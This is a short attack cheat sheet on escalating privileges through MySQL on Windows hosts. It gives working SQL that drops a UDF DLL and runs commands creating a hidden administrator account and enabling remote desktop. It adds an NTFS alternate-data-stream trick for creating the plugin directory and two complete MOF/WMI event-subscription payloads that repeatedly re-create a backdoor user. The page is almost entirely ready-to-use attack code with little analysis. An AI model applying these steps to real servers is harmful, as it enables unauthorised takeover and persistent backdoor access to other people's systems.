MySQL Privilege Escalation
1. UDF privilege escalation using sqlmap's lib_mysqludf_sys
1. Find a writable directory and upload lib_mysqludf_sys.dll; depending on the MySQL version, import it into windows\system32 or into MySQL's \lib\plugin directory:
select @@plugin_dir;
select load_file('C:\\RECYCLER\\lib_mysqludf_sys.dll') into dumpfile 'C:\\windows\\system32\\lib_mysqludf_sys.dll';
2. Create the function and execute commands through it:
create function cmd returns string soname 'lib_mysqludf_sys.dll';
select cmd('net user mrxt 123456 /add');
select cmd('net localgroup administrators mrxt /add');
select cmd('regedit /s C:\\3389.reg');
drop function cmd;
delete from mysql.func where name='cmd';
3. In some cases you get "Can't open shared library"; the DLL then has to be exported into the lib\plugin directory. If that directory does not exist, it can be created with an NTFS ADS (alternate data stream) write:
select 'dll file' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\::$INDEX_ALLOCATION';  -- creates the lib directory
select 'dll file' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';  -- creates the plugin directory
2. MOF privilege escalation
Find a writable directory and upload the MOF file, for example C:\RECYCLER\.
This payload uses WScript.Shell:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
 EventNamespace = "Root\\Cimv2";
 Name = "filtP2";
 Query = "Select * From __InstanceModificationEvent "
 "Where TargetInstance Isa \"Win32_LocalTime\" "
 "And TargetInstance.Second = 5";
 QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
 Name = "consPCSV2";
 ScriptingEngine = "JScript";
 ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user mrxt 123456 /add\")";
};
instance of __FilterToConsumerBinding
{
 Consumer = $Consumer;
 Filter = $EventFilter;
};
This payload uses the Shell.Users object instead:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
 EventNamespace = "Root\\Cimv2";
 Name = "filtP2";
 Query = "Select * From __InstanceModificationEvent "
 "Where TargetInstance Isa \"Win32_LocalTime\" "
 "And TargetInstance.Second = 5";
 QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
 Name = "consPCSV2";
 ScriptingEngine = "JScript";
 ScriptText = "var WSH = new ActiveXObject(\"Shell.Users\")\nz=WSH.create(\"NewUser\")\nz.changePassword(\"123456\", \"\")\nz.setting(\"AccountType\")=3";
};
instance of __FilterToConsumerBinding
{
 Consumer = $Consumer;
 Filter = $EventFilter;
};
Then export it into the c:/windows/system32/wbem/mof/ directory:
select load_file('C:\\wmpub\\nullevt.mof') into dumpfile 'c:\\windows\\system32\\wbem\\mof\\nullevt.mof';
This method keeps re-adding the user every time the filter fires; to stop it, run net stop winmgmt and then delete the file.
References:
http://www.waitalone.cn/mysql-tiquan-summary.html
http://zone.wooyun.org/content/1795
http://www.exploit-db.com/exploits/23083/